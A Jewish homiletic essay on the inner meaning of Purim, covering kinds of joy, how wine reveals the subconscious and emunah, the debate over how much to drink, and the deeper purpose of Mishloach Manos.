The words rinah and ditzah contain the letters yud and hey, which spell a name of Hashem, while the word chedvah has the letters vov and hey.
Let us try to understand the difference between these different expressions of simcha.
The word for “man” in Hebrew is ish, while the word for “woman” is ishah. The word ish contains the letter yud, while the word ishah contains the letter hey; the letters they share, aleph and shin, spell aish – “fire” – alluding to “aish Hashem”, the “fire of Hashem.” When man and woman are unified through marriage, the happiness of gilah, rinah and ditzah is created. The letter yud of the ish/man and the letter hey of the ishah/woman come together and form these three kinds of happiness – gilah, rinah, and ditzah – which all contain both the letters yud and hey.
If we reflect into the words of Megillas Esther, we see that the joy of the Purim miracle was actually brought about by Haman’s plan to annihilate the Jewish people. Haman was the descendant of Amalek – whom the Jewish people have endured much suffering from. The Sages said that from the time Amalek attacked the Jewish people, the Name of Hashem is incomplete; the letters yud and hey have been split apart from the other two letters, vov and hey, in Hashem’s Name – ever since Amalek attacked. The Name of Hashem will be incomplete until Amalek is erased.
As long as Amalek exists, our simchos (happy celebrations) are never complete – although it appears that we are making simchos. Some simchos are like chedvah, and some simchos are like gilah, rinah and ditzah [but each of these is incomplete, for they each represent only half of Hashem’s Name].
In order to see how the joys of gilah, rinah and ditzah differ from chedvah, we need to see the contrast between these different kinds of happiness.
Chedva – Joy Based On Unifying With Others
The word for “one” in Hebrew is echad, and in Aramaic, “one” is “chad.” In the Aramaic version, the letter aleph is taken away from the word echad, which spells “chad”. The first two letters of the word chedvah – the letters ches and daled – are related to the word yachad, “together”, which connotes unity. When we add on the last two letters of the word chedvah – the letters vov and hey – we have essentially unified the letters vov and hey. Chedvah is thus a concept of unifying that which used to be apart; chedvah takes two separate parts and unifies them into one.
It is thus fitting that chedvah should be one of the expressions of joy found in the blessing given to the chosson and kallah, because man and woman, who were previously separated, are now being united through marriage.
We also find a usage of the term chedva by Yisro, who rejoiced when he heard about all the miracles of the Jewish people, and he was thus drawn to the Torah; it is written, “Vayichad Yisro”, “And Yisro rejoiced” – “Vayichad”, from the word “chedvah.”
This is the joy of Chedvah – when one succeeds in unifying with something that used to be apart from him. Unity causes joy, and there is thus joy between newlyweds, for the single man and woman used to be apart, and now they have unified.
Gilah, Rinah and Ditzah – Joy Based On Unity Within
But the other kinds of happiness – Gilah, Rinah and Ditzah – are a different concept than Chedvah. These are kinds of joy that one attains when he connects to his own self.
Most people are not always happy. Why?
It is because most of us are in a situation of “half a body” – we are split apart inside our own self, and this is due to our many doubts that plague us; our doubts give us no rest, and this makes us disconnected from our own inner self.
Our sefarim hakedoshim state, “There is no happiness like the clarification of doubts.” When a person succeeds in removing his doubts, he attains somewhat of a connection to his inner self, and he feels a certain joyous satisfaction from this. These are the joys of gilah, rinah and ditzah.
We have thus seen two kinds of happiness: joy upon connecting with others – such as marriage between man and woman – and the joy of connecting to oneself.
Joy From The Outside Is Superficial
The joy of chedvah is thus when we unify with something that was apart from us, while the joys of gilah, rinah and ditzah are when we attain unity within our own soul.
Let us reflect: Is most of our happiness coming from within ourselves, or is it coming from something outside of ourselves? Upon a little thinking, we will discover that most of our happiness is coming from externalities, such as buying a new house, buying a new car, buying a new suit, or getting married. Most of our simcha comes when we “get” something from the outside. For this reason, most of our happiness is not complete: as long as our happiness is coming from something external, it is only temporary. The happiness we experience is fleeting; the things that make us happy come and go.
How can we reach complete happiness? It can be reached if we succeed in unifying the parts of our soul together; this will cause us to have an inner joy, and it will lead us to attaining a complete kind of happiness.
Most of us have disparity in our soul; we are constantly full of desires that contradict each other. A person has many things he would like to do each day, and the day simply isn’t long enough to fulfill of these desires. He is left with no choice but to prioritize what he wants the most and give up pursuing some of his desires. We are all full of many retzonos (desires), and these retzonos are all contradicting each other! We are sensible people who possess daas (mature thinking) and therefore we are able to choose what our priorities are. But we are still left with many contradicting desires within us, and this prevents us from attaining any complete happiness.
“When Wine Enters, Secrets Come Out”
If a person succeeds in attaining his inner happiness, he reveals a whole new depth to his soul, as we are about to explain. The words of the Sages are well-known: “When wine enters, secrets come out.” Wine bears a connection with revealing our innermost secrets. It is also written, “Wine gladdens the heart of man.” Wine bears a connection with happiness. Wine reveals our secrets, and this somehow brings out our happiness. What is the connection between our secrets and our happiness?
We first need to reflect into what this means. When the Sages said that wine reveals secrets, what kind of secrets were they referring to? Were they referring to a secret that our mother told us when we were children, which we never told anyone before, and then on Purim we get intoxicated and reveal those secrets…? Any sensible person knows that such secrets have nothing to do with the wine of Purim. So what kind of secrets were Chazal talking about, that wine can come and reveal?
Chazal were telling us that wine reveals our innermost secrets. They were revealing to us that through wine, we can reveal our innermost secrets – the depths of our soul.
What is a secret? If Reuven tells a secret to Shimon and he tells him not to tell anyone, even this isn’t considered a total secret. Theoretically, Reuven can give permission to Shimon to reveal the secret, so the secret isn’t considered to be a total secret.
If someone is sitting in his house and daydreaming, nobody else knows what he is thinking. But is that called a secret? If it is, then the whole world is full of secrets…! So this can’t either be the meaning of “secret.”
What is a true kind of secret? A true secret is something that is concealed from a person. A secret is when a person isn’t aware of himself, when he’s not aware of what’s going on deep down inside himself. This is a secret, because the person is living with himself all the time and he thinks that he knows himself, while he really doesn’t know himself at all. That’s a secret.
Is there any person who can say that he understands what is going on in the depths of his heart?! Anyone who thinks that he knows himself well is someone who really doesn’t know himself at all! Anyone who has a little bit of self-awareness is well-aware that the soul is full of so much depth, layer within layer – and that more depth to our soul is being revealed with the more and more we live our life. Nobody can say that he really knows what’s going on deep down inside himself.
“When wine enters, secrets come out” means that wine can reveal an additional depth to a person about his own soul – things that he was previously unaware of.
The Secrets Which the Wine Reveals
We can now reach a new understanding in this statement of Chazal, “When wine enters, secrets come out.” From where are our secrets coming out from? A superficial understanding is that our secrets are coming out of our mouth; that when a person gets intoxicated, secrets come forth from his mouth. It’s clear to all that this is not what Chazal mean. According to what we explained above, wine can get our consciousness (in Hebrew, hakarah or muda) to become aware of what’s going on in our sub-conscious (in Hebrew, tat-hakarah or tat-muda). Wine can serve to reveal our innermost depths of the soul – depths which we had been previously been unaware of.
“When wine enters, secrets come out.” Our subconscious desires, which used to be a secret to us, can be revealed to us through the wine; thus, the wine reveals our “secrets.” When our soul becomes revealed to us, this causes us to have an inner happiness.
This is a kind of happiness which is totally different that the regular kind of happiness we are familiar with, which is when we get new things. It is a happiness that takes place internally, and it is called the joy of chedvah: when our soul unifies with itself.
What takes place when our soul becomes unified within ourselves? Let us reflect about this.
When a person has doubts, these doubts are found within a certain layer of his soul. How can a person solve his doubts? The superficial way to solve doubts is to calmly weigh the options and then decide what to do. If a person can’t decide alone, he’ll ask someone else for advice.
But there is an inner method a person can use to solve his doubts, and that is when a person reveals a greater depth to his soul. The doubts are then removed automatically. This is the meaning behind how “Wine enters, secrets come out.” The whole reason why we can ever have a doubt is because a certain layer of our soul was hidden from us. Through drinking the wine on Purim, we can reveal a deeper layer in our soul which we previously were unaware of – and this removes the source of the doubt.
Understandably, this does not mean that wine creates new depth to our soul. The wine isn’t creating anything in us. It is just that through drinking the wine, the resulting intoxication can make us become aware of the more hidden parts of our soul – and this in turn reveals to us new depth about ourselves.
As a simple example, let’s say a person is beginning to learn Torah, and he’s not sure about which area in Torah he should learn. He narrows it down to two options, but he can’t decide. Later on in his life he can gain more understanding about himself, and then he will discover that one of the options isn’t the path that is meant for his soul to take.
Another example: as long as a person doesn’t know himself well – the nature of his personality – if he’s looking for a certain job, he’s not sure about what kind of job will work for him. When he gets to know himself better, the doubts become non-existent.
There is a huge difference between these two different solutions to our doubts. The first method is superficial, because when a person decides between two options, he can still be bothered by the second option; it is just that he has decided to go with the first option. But with the deeper method – which is when a person discovers new depth to his soul, through attaining greater self-awareness – he has no doubt whatsoever. He sees clearly what the truth is, and he feels inner happiness at this. “There is no happiness like the clarification of doubts.”
The Conscious and The Sub-Conscious
Now that we have explained that wine serves to reveal the innermost depths of the soul to a person, we need to understand: How does this work? How exactly does wine reveal to us what’s going on in our soul?
As is well-known, we all have in us abilities that are revealed to us, as well as abilities which we aren’t yet aware of. In more modern language, we have in us a conscious and a sub-conscious. Our Rabbis knew about this before modern psychology discovered it. Reb Yisrael Salanter described our conscious as our revealed abilities (“kochos giluyim”), and our subconscious as our unrevealed abilities (“kochos keihim”).
What is our subconscious – our unrevealed abilities?
Reb Yisrael Salanter gave an example which illustrates the concept. Once there was a Rosh Yeshiva who had a son and a student, and to his great pain, his son went astray from religious observance. The student, however, remained powerfully connected to his beloved teacher, and was utterly loyal to him. As time went on, the father grew to love his student more than his son, while he grew more and more estranged from his son, to the point of hatred.
Then, in the middle of the night, a fire suddenly broke out in the building where both his son and his student slept. The father was woken up and told that he only had enough time to save one of them: either his beloved student – or his rebellious son, who had caused him so much grief. Which one of them would he save?
Reb Yisrael Salanter answered: He will instinctively run to save his son! All of his anger toward his son gets pushed aside now that he has to choose between his son and his student. Now, if he had had time to think about it, he would choose to save his student, who is more precious to him than his son. But when he is woken up in the middle of the night and there is no time to think, he acts upon his subconscious. What is going on in his subconscious? Deep down, he loves his son more than the student; that love has just been pushed under all this time. When push comes to shove, the inner love for his son is awakened, and it overpowers the love he has for his student.
Once a student of Rav Dessler zt”l came to him and told him that he had a nightmare: a dream in which he killed his son. He was terrified at the meaning of the dream and asked how it was possible for him to have such thoughts in his head, when he loved his son very much; did it mean that he really wanted to kill his son?! Rav Dessler told him, “Sometimes, your son cries and wakes you up at night. For a few seconds, you are so annoyed at him for waking you up that you wish he didn’t exist. That is why you were able to have such a nightmare.”
Would the father ever consciously wish he could kill his son? Chas v’shalom; of course not. But in a dream, a person is shown what’s going on in his subconscious, and he is shown that he has such quickly passing thoughts.
How can a person discover what’s going on in his subconscious? It is written, “On my bed at nights, I sought that which my soul loved.” If a person wants to find out what he truly desires deep down in his soul, it is revealed to him “on my bed at nights” – when he’s asleep and dreaming. Sometimes a person is shown his subconscious when he’s partially asleep, when he’s still a bit conscious; and sometimes he is shown his subconscious when he’s totally asleep, which is when he’s dreaming.
Bringing Our Sub-Conscious Into Our Conscious
It is now upon us to think into the following.
If a person is having negative kinds of thoughts that pass through his mind quickly throughout the day – subconsciously – what can he do about this? Most people aren’t bothered by these negative thoughts. When people get these strange thoughts, they quickly push them aside, and they do not try to figure out what triggered them.
But when a person wants to understand himself well, he is bothered by negative thoughts even if they pass by in his mind very quickly. He begins to learn about what his thoughts are, and he realizes that his thoughts are showing him what’s going on in his subconscious.
The solution is not to try to push aside the unwanted thoughts; to the contrary, let the thoughts stay, so you can see what’s going on in your subconscious [unless they are forbidden thoughts]. After this comes the next step: a person should not focus on the actual thoughts themselves, but on the information that the thoughts are revealing.
If a person only tries to work on awareness of his thoughts, he will attempt to push aside his negative thoughts, and he won’t be able to truly grow and better himself. He’s running away from the root of the problem. The problem is not his negative thoughts; the negative thoughts he’s experiencing are merely branches of the problem. The root of the problem is the sub-conscious in himself which hasn’t yet been purified. So just dismissing the thoughts will not really be solving the problem at its root, but rather avoiding the problem.
The real solution is not to push aside the negative thoughts, but rather, to let them be and see what they are revealing. This is a double gain. First of all, one will be able to realize what his weaknesses are, and this awareness will help him fix them. Secondly, he will be able to notice qualities of his which he was previously unaware of, and thus come to utilize his potential.
The Way To Recognize Your Subconscious Thoughts
Our subconscious is contained in every one of our souls, but it isn’t accessed simply through our mind. The thoughts coming from our subconscious come to us in quick flashes, like lightning. Lightning comes where it’s dark and cloudy, and then it is gone in a flash; it disappears as quickly as it came, and it’s impossible to calculate the exact moment that it strikes.
This can give us some idea about the thoughts contained in our subconscious. These inner thoughts are termed in the sefarim hakedoshim as “birds that fly in the sky”; they pass quickly, flying away very fast, like birds. They pass in our head so quickly that often we are unaware of them at all. But the more a person elevates himself spiritually, the more he enters inward, the more he can become aware of his deeds, words and his thoughts.
The way to become aware of our thoughts is by listening within ourselves, which is a subtle kind of listening. When we notice the suddenly passing thoughts, we can then better recognize what’s going on in our subconscious.
Our subconscious cannot be reached through trying to think about it; we cannot reach our subconscious, which is hidden, through our conscious mind, which is revealed to us. If we try to reach our subconscious through our conscious mind, this is like trying to water a plant from the top of the earth, without taking care of the roots underneath.
Revealing Our Subconscious – Through Getting Intoxicated On Purim
There is another way to reveal our subconscious [besides for noticing our quickly passing thoughts], and that is through drinking the wine on Purim and thereby becoming intoxicated [in the proper way, as we will soon explain].
The Hebrew words shechor (blackness) and sheichar (intoxicating beverage) share the same root letters, with the similar letters ches and chof interchanging. This hints to us that the nighttime, which is blackness, reveals to us the same things which intoxication can reveal to us.
The Sages explain that the word “Achashveirosh” contains the same letters of the word shechor (black), because he “blackened” the eyes of the Jewish people with his decrees. To counter his darkness which he brought upon the Jewish people, we intoxicate ourselves with the holy kind of darkness – the sheichar, the intoxicating beverages.
This is the purpose of getting intoxicated on Purim: by getting intoxicated, we are able to become aware of what’s going on in the depths of our soul.
How Much Should We Drink On Purim?
In the words of our holy Rabbis, there are differing opinions concerning how intoxicated one should become on Purim. The halachah is that “One is obligated to become intoxicated on Purim until he does not know the difference between Blessed is Mordechai and Cursed Is Haman”; one of the Rabbis wrote that it was revealed to him in a dream that one has to get intoxicated only until that point, but not beyond that. In other words, one should drink on Purim more than he usually does (which is the view of the Rema), but he should not get to the point in which he is so drunk that he doesn’t know the difference between Mordechai and Haman.
There is a differing opinion of our Rabbis, which is to get drunk in the simple sense – that one should get so drunk to the point where he does not know the difference between Mordechai and Haman.
This is the argument, but for every argument of our Sages, there is always a rule that “Their words, and their words, are the words of the living G-d.” Therefore, both opinions are correct; let us understand how they both can be true.
As is well-known, most people get to know themselves a lot better when they become intoxicated. The truth is that the whole intention of why we should get intoxicated on Purim is for this very reason: to reveal our inner essence – our pure soul. Since most people are not in touch with their pure essence, we are commanded to intoxicate ourselves on Purim so that our inner purity can burst forth.
The more a person works to purify himself inwardly, the more his intoxication comes from deep within. For him, the mitzvah to become intoxicated on Purim is to get to the point of ad d’lo yoda, in which he does not know the difference between Mordechai and Haman – for the whole purpose is to reveal outward the beauty and purity of the soul hidden deep within him.
But if a person hasn’t worked to purify himself internally, then when he gets intoxicated, much of the garbage that has piled up inside him throughout the year comes pouring out. We often see people on Purim rolling around in the street in their drunkenness, spewing forth all their inner emptiness. For these kinds of people, drinking on Purim should only go up until the point of ad d’lo yoda, and not beyond it.
How can a person know if he should only get intoxicated until the point of ad d’lo yoda, but not beyond that – or if he is meant to go beyond lo yoda?
The way to know this is hinted to in the concept we brought before: that shechor\blackness and sheichar\intoxication share the same root. Most people, if they were walking alone at night in a forest, would be very scared. Darkness, shechor, is a power in Creation that causes us to have fear. Since shechor is reflected in sheichar\intoxication, such a person, when he gets intoxicated, will reveal forth the level he is really on, as if he were walking alone through a forest at night…
There are a few exceptional individuals to whom the possuk can be applied: “To tell over in the morning of Your kindness, and of Your faith at nights.” When someone walks alone through a forest at night and still has emunah – he is the kind of person who can become completely intoxicated on Purim and elevate himself through it. His intoxication will only serve to reveal forth his inner essence, which has become purified through emunah – for he completely trusts in Hashem.
Thus, becoming intoxicated reveals what’s going on in the depths of each person’s soul. If someone has worked to purify his soul, getting intoxicated will reveal forth the beauty and holiness of his soul. Such a person reaches the purpose Chazal intended when they enacted that we should become drunk on Purim.
Most people, however, do not reach the intended purpose of getting intoxicated on Purim. When they get drunk, the worst in them is brought out. Getting drunk thus causes most people to lower their self-image in the eyes of others. This resembles a person who places a big sign on himself that advertises all his worst shortcomings, and then he walks all over town with it.
Each person needs to figure out if it’s worth it for him to get drunk on Purim. A person has to ask himself: “If I get drunk on Purim, will I behave in the way that Chazal intended me to?”
If a person knows himself well and knows that he has worked to purify himself internally during the year, then he is able to fulfill ad d’lo yoda on Purim. But if a person knows that he will come to improper behavior when he gets to the point of ad d’lo yoda, then he must know that for him, getting drunk on Purim totally defeats the purpose of Purim.
The Purpose of Getting Drunk On Purim
Now that we have clarified who should be getting drunk on Purim, we can explain what indeed we are trying to gain from it.
When a person has worked to purify himself internally, there is still more depth to himself that he doesn’t know about. When he gets intoxicated, he can discover new depth to himself which he never knew about until now.
Chazal said that “When wine enters, secrets come out.” To the degree that one has revealed his soul, greater secrets will be revealed from within through the wine on Purim. Thus, for someone who has purified himself internally, getting intoxicated through the wine of Purim will bring him a kind of joy that is inner and G-dly. The wine of Purim, for such a person, acts to reveal forth his inner purity, which he was previously unaware of. The wine of Purim allows such a person to identify with greater and deeper spiritual attainments that he didn’t reach until now. To this we can apply the possuk, “Wine gladdens the heart of man.” There is no greater happiness than this, and only an internal kind of person merits it.
When the wine on Purim serves to achieve this holy goal – revealing greater depths of his pure soul to the person – then after Purim, the person will feel that he has been elevated spiritually, and the ensuing inner happiness will burst out of him.
But most people have not worked to purify themselves inwardly. One might look like a very happy person on Purim to those who observe him, but this is only because wine temporarily puts a person into a good mood. We can see clearly that people start out happy on Purim when they’re drunk, but then they become depressed; a sort of melancholy comes upon them from getting drunk. There are very many people on Purim who cry bitterly when they’re drunk.
Where is this sadness coming from? It comes from the bitter truth that is being revealed to the person on Purim: he has not yet purified himself internally, and the wine reveals forth all of his deep sadness. He is terribly and profoundly sad deep down, and all of this comes out when he’s drunk. He becomes sad from this revelation, and so, of course, he cries.
Chazal say, “One who sees a sotah in her ruination should abstain from wine.” The deep explanation of this matter is that from the case of sotah, we can see how low a level a person can sink to when he’s drunk [and to take a lesson from this, one should avoid getting drunk].
Facing Our Fears
According to the above, we can now understand well the connection between getting drunk on Purim and the Purim miracle.
When a person is going through a distressful time, how does he react? One kind of person will fall into despair and completely lose hope. As it is written in the Megillah, “K’asher avadti, avadti” – “For I am surely lost.” But an internal kind of person, when he goes through a time of distress, uses it as an opportunity to summon forth inner strengths which he never knew about before.
If we ask anyone who persevered through an intensely troublesome time in their life, “Did you think you had the strength to survive such an ordeal before you went through it?” they will often answer in the negative. They were unaware that they possessed the stamina to undergo the hardships they went through; but really, they had the strength all along. It was just hidden deep within. When a person goes through a tzarah (a time of distress), he is able to reveal forth the hidden strengths of his soul, which he never knew he possessed.
Every person should reflect and think into the following. If you would know for sure that in two weeks, a decree would go out in your country that all Jews were to be annihilated – just as in the times of Haman, who decreed genocide upon the Jewish people – how would you react? Understandably, there would be people who would fall into despair right away, and their first reaction would be to flee to another country. Their reaction would resemble how the Jews in the desert wished to return to Egypt…
But an internal kind of person would face the fear in the right way. He would be able to summon forth new fortification from within himself that he was previously unaware of, and instead of having thoughts of running away from the danger, he would “run away” into a place in his own soul in which no one can harm him. Instead of falling into despair from the danger, he becomes elevated from the situation, revealing forth from within himself great spiritual stamina.
This was what the Jewish people revealed on Purim. Haman decreed that all Jews be annihilated, and Achashveirosh, who was the most powerful king in the world then, was ready to carry it out. According to nature, he should have succeeded. It was a situation of utter and palpable fear; each person felt it totally.
But they did not despair, in spite of their predicament. They escaped from the danger into an inner place in their souls, and revealed forth new depth to themselves. They had never known beforehand that they possessed such stamina. When the decree was nullified, they merited to receive the Torah in a whole new way.
The Essence of Our Avodah on Purim
The big secret about Purim is to show us that during the rest of the year, we really do have the strength to uncover new depth about our soul. Although we do not face physical danger to our lives nowadays [of course, sometimes there are anti-Semitic events that take place in our times today, and this awakens us to feel an idea of what it felt like during the times of Haman’s decrees; but generally speaking, the Jewish people does not face genocide these days], on Purim, we are able to return to the inner depth of our souls, which was what the Jewish people revealed during the era of the Purim story. We must try on Purim to reach the level which the Jewish people attained on Purim.
When a person never matures in his spiritual situation, then even when he is seventy years old, he remains at the level he was at when he was seven. He continues to enjoy his childish antics even as he supposedly “matures” through life. An example that truly illustrates what we mean: we can find people who sincerely believe that Purim is about acting like a little child! Their entire Purim consists of costumes and decorative makeup, in a way most fitting for a child’s playgroup room.
But someone who has matured at least a bit about his life – and we do not mean just physically, but that his heart has become more developed in sensing the inwardness of reality – someone who at least searches a little for the truth, understands clearly that Purim is something deep and profound. He understands that Purim is about revealing new depth to our soul – revealing from within ourselves abilities that we never knew about beforehand.
Every mitzvah we have on Purim contains depth to it. There is depth to the mitzvah of Mishloach Manos (sending gifts to our friends). There is depth to our mitzvah of reading the Megillah. There is depth to eating the meal of Purim. And there is depth to getting drunk on Purim – a great depth.
If a person wants to really know if he has grown spiritually from Purim, he should discern if he has revealed new depth to his soul as a result of drinking on Purim. He should ask himself: “Am I more self-aware now? Do I know things about myself now which I never knew before? Or was it just another Purim that came and went, with nothing special about it…?”
One of the ways we become more aware of our soul is through drinking on Purim. But as we cautioned before, getting drunk can backfire on a person if he is the kind of person who should not be getting drunk; he will only spew forth negativity. Understandably, this is not the purpose of Purim.
If Chazal would have intended that people should get drunk on Purim in order to release all their negativity outward, then getting drunk on Purim would mean that we have to simply let loose; and then perhaps the person would have to write down how he behaved when he was drunk…
But we know clearly that Chazal’s intention in having us get drunk on Purim was not so that a person should release his negativity. It is about becoming more aware of the inner layers of our soul. That is why ad d’lo yoda is only meant for one who has worked to purify and cleanse himself internally.
Higher Than The Subconscious: “Above” The Conscious
Now that we have explained at length about our conscious (kochos giluyim\revealed abilities) and our sub-conscious (kochos keihim\hidden abilities), we can now explain another layer in our soul: the layer that is above our conscious. We will also explain how we reveal it on Purim.
Our conscious is what we are aware of, while our subconscious is the part of our self that we aren’t aware of. We are also not aware of what lies above our conscious. This sounds like the same thing as our subconscious, but we will explain how they are different. What we also need to understand is: if the area above our conscious is clearly above our conscious thoughts, then how can we incorporate anything that’s above our consciousness into how we act, since action is on a lower plane than thought?
There is a fundamental difference between the sub-conscious and the above-conscious. Our sub-conscious is the desires in us which we are unaware of. These are things we want, but we aren’t aware that we want them; our deeper desires are hidden from us. By contrast, our above-conscious refers to the higher will that is implanted in us, which is leading us in how we act.
When we are aware of what we want, these desires are called our conscious. When we want something but we are unaware that we want it, this kind of desire is called a sub-conscious desire. Even if these sub-conscious desires are more powerful than our clearly revealed conscious desires, the deep desires are still considered to be only in our sub-conscious, since we are unaware of these deeper desires. But if we have deep desires which are actively affecting how we act in our life – and these are desires which we are unaware of – these desires are called our “above-conscious” desires.
The “above-conscious” desires are above a person, but they are desires that actively affect how a person acts, in spite of the fact that the person is unaware of them. We can compare this to a plane that is on auto-pilot. It seems to the onlooker as if the pilot sitting in the cockpit is the one controlling the plane, but the plane is really being controlled by a different person, who is sitting far away in a control station.
Bechirah and Emunah
We will now sharpen the ramifications of this concept.
Whenever a person does anything, two forces are going on in his soul. One of them is called the power of bechirah (free will). The other force is called emunah (faith). When a person is acting upon his bechirah, his will to act is coming from within himself – whether he is aware of this consciously, or only subconsciously. By contrast, someone acting upon emunah is acting from above his conscious – he is being led by his emunah, which essentially means that he is being led by the Creator.
Our bechirah tells us that we are in charge, for we decide how we will act. We are either aware of this consciously or sub-consciously, but either way, when we use our bechirah, we think that we are in charge. By contrast, our above-conscious, our emunah, tells us that we are not in control, because there is a Higher Power in charge of us – the Creator.
The above-conscious is called so not just because we are unaware of it, but because it shows us that there are matters beyond our control that are guiding us; and their source is the Creator. So our sub-conscious and our above-conscious are the deep parts of our self which are controlling us. Most of our bechirah is not utilized through our conscious state, but through our sub-conscious. When we consciously use our bechirah, it is about getting something done; but when it comes to choosing what we want, this bechirah takes place in our sub-conscious. The sub-conscious is the source which brings our desires into action.
Higher than our point of subconscious bechirah is our point of above-conscious. This is the higher power in a person which controls and directs a person’s life, and it is being provided by the Creator.
Intoxication on Purim Can Reveal Our Emunah
Now we can understand that the concept of “When wine enters, secrets come out” is not just referring to how wine reveals our subconscious into our conscious. Rather, the main purpose of the wine is to reveal to us the deeper force in us than our subconscious: our point of above-consciousness.
In other words, revealing the subconscious is not yet the ultimate level that can be reached on Purim. If a person merits to uncover more depth to his soul, the secret that the wine will reveal forth from him will be his innermost desire of the soul, the deepest ratzon (will) of his being – the will to do Hashem’s will.
This revelation that can take place does not just come as an additional piece of knowledge to the person, but as a soul experience. Let us explain this.
If anyone is asked who they believe is running the world, the answer is: “The Creator, Hashem.” But if someone is asked, “But is that how you feel?” then we will get different answers. Not everyone will answer in the affirmative.
The wine of Purim can help a person bring his knowledge about belief in the Creator to become an actual feeling. Through being intoxicated, the wine can transfer the above-conscious into our conscious state – through the means of our sub-conscious. A person will then be able to sense, in a palpable way, Who is running the world: only Hashem.
Megillas Esther: Revealing The Hidden
As is well-known, “Megillas Esther” can mean the revelation (Megillas, from the word giluy\revelation) of the hidden (Esther, from the word hester\concealment). The word Megillah seems to be the total opposite of the word Esther, because Megillah refers to the revealed, while Esther refers to the hidden. But Megillas Esther shows us that there is no contradiction: it reveals what used to be hidden – whatever was considered hidden until now has become revealed.
It can be said, as a borrowed terminology, that every person contains in his soul a kind of “Megillas Esther.” The hidden parts to our self are our sub-conscious and our above-conscious, and Megillas Esther represents our ability to reveal the realm of the sub-conscious and the above-conscious into the realm of our consciousness. Our bechirah, which is present in our sub-conscious, is hidden from us; and our emunah, which is present above our conscious, is also hidden from us. Megillas Esther can show us how we can reveal these hidden parts to our self and bring them into our conscious awareness.
As we go throughout the day living our life, we are experiencing life through our conscious awareness, while we experience our subconscious only sometimes. Most people are not experiencing their above-conscious – their emunah. Even though most people will say that they believe in Hashem and that He’s running everything, there are very few people who are living and experiencing their emunah.
Megillas Esther is the megillah, the revelation, of the hidden. It shows us the hidden parts to our soul – our subconscious and our above-conscious. In the words of our Rabbis, the Megillas Esther can reveal to us our subconscious bechirah, and it can also reveal to us our emunah – our higher will, which is deep down guiding us.
The Meaning Behind Mishloach Manos
Another mitzvah that Chazal commanded us on Purim is Mishloach Manos, to send gifts of food to our friends. Let’s think into this: what does sending gifts to our friends have to do with the miracle of Purim – that we were saved from genocide?
As is well-known, the purpose of this mitzvah, Mishloach Manos, is to increase love and friendship between fellow Jews. Simply understood, this is accomplished in the best way by finding someone whom we don’t like and giving him Mishloach Manos – and we hope that our enemy will open the door for us when we show up at his house.
But the depth behind the mitzvah is that since our inner essence can become revealed on Purim, our inner love for other Jews will hopefully come with this – and that is why we are commanded to give Mishloach Manos on Purim.
Mishloach Manos must be sent from “man to his friend,” as the Megillah states, which implies that even someone who you didn’t think was your friend yesterday is really your friend! This is what Purim reveals – our inherent love for each other. Mishloach Manos is not just about giving to our friends; the main point of it is to give to those whom we aren’t friendly with, and to discover that they, too, are our friends. Through Purim, we can discover our subconscious, and our subconscious tells us that we have bechirah to choose whether we will hate others or not. Therefore, if we hate any Jew, it’s only because we are choosing to – and it’s the wrong choice.
If we reach even deeper into ourselves on Purim, we reach our above-conscious, which is deeper than the sub-conscious. Our above-conscious reveals to us a deeper understanding than what we discover in our sub-conscious: that even if someone has hurt you in the past, it’s not him who hurt you; he was only a messenger of Hashem, because ultimately, it is Hashem who is in charge. If someone was supposed to get insulted and hurt by someone else, this was decreed on him by Hashem. When someone realizes this, his hatred toward his abuser will melt and eventually disappear.
This is the meaning of Mishloach Manos, gift-baskets that a “man sends to his friend.” Purim serves to reveal to a person a whole new inner depth, and upon reaching that deep perception, a person can send Mishloach Manos to others.
Purim Is Holier Than Yom Kippur
Understanding this, we can now come to appreciate the great spiritual benefit of the day of Purim. The sefarim hakedoshim explain that Purim is a holier day than Yom Kippur, because “Kippur” can be read “like Pur”, a hint to how Yom Kippur is almost as holy as Purim. This implies that Purim is holier than Yom Kippur.
What is the connection between Yom Kippur and Purim? They are both special opportunities to attain unity with other Jews. One’s sins are not atoned for on Yom Kippur unless he has been forgiven by others for any wrongdoing he did to them.
Purim is an opportunity to gain an even higher degree of unity than the good terms we must reach with others on Yom Kippur. When we ask forgiveness from others, even if we are forgiven, some hard feelings remain. The person who was hurt still feels that he was hurt even after he forgives; it is just that he has forgiven the one who hurt him. But on Purim, the message of Mishloach Manos reveals to us a greater sense of bonding with others: we are able to feel that no one did any harm to us at all. From that understanding, we strive to give Mishloach Manos.
Thus, the mitzvah of reading the Megillas Esther hints to us that on Purim, we can reveal the hidden. The mitzvah of Mishloach Manos and the mitzvah of ad d’lo yoda, as we explained, are also about revealing the hidden depth in ourselves.
Pre-Packaged Mishloach Manos
Something that has become popular in our times is that people go to the store and buy pre-packaged Mishloach Manos; some of them are more expensive than others. For someone’s close friends, he buys them an expensive package, and for those who he’s not as close with, he buys a cheaper one. There is already a greeting written on the Mishloach Manos that comes with the package, and the buyer simply fills in the name and address of where it has to go to, and whom it’s from. It is then sent through a delivery man (one thing they haven’t figured out yet, though, is how to get the deliverer to give it with his heart to the recipient…). In this way, people think that they have fulfilled the mitzvah of Mishloach Manos in the most beautiful fashion.
Any sensible person understands that this is not the intended kind of Mishloach Manos. When we give Mishloach Manos to others, it has to come from an inner place in ourselves, and not in the usual way that we give gifts to our friends during the rest of the year.
Every person should ask himself: “What is motivating me to give Mishloach Manos?” Of course, the main reason we are giving is because Chazal commanded us to. But if we perform this mitzvah mechanically and not from an inner place in ourselves, it’s like “a body without a soul”. The soul of Mishloach Manos is that we need to use it as a tool to reveal a sense of inner unity with other Jews.
If we reflect into what we said before, we can see that Purim is totally different than all other auspicious times of the year. We will not get into now what each Yom Tov reveals for us; but what we will say is something general, that each Yom Tov serves to reveal a special power of our soul. Purim is not like any other Yom Tov; Purim reveals the very root of our soul, a point that is way above our conscious state.
Revealing The Inner Essence of Purim
What is the root of Purim’s essence? Why indeed is Purim such a special time? It is because the Purim miracle that took place during the times of Mordechai and Esther transpired only due to their mesirus nefesh (self-sacrifice for Hashem).
When a Jew has mesirus nefesh, besides the fact that he gets eternally rewarded for this in the Next World, there is much more that he gains. Through mesirus nefesh for Hashem, a person reveals the depth of his soul – his true, inner self.
It is said in the name of the Arizal that the tzaddikim throughout the generations who were killed al kiddush Hashem (in sanctification of Hashem’s Name) did not actually experience any pain when they were being killed! This applies as well to Rabbi Akiva, who was killed by the Romans with iron combs; because he died al kiddush Hashem, he did not feel pain at all, even as he was being killed. How could such a thing be? How could they not have felt pain? It is because when a person reaches mesirus nefesh, he reaches the inner essence of his soul, and his soul has an entirely different perspective on things. The soul of a person is able to view this situation with such loftiness that the person experiences no physical pain whatsoever.
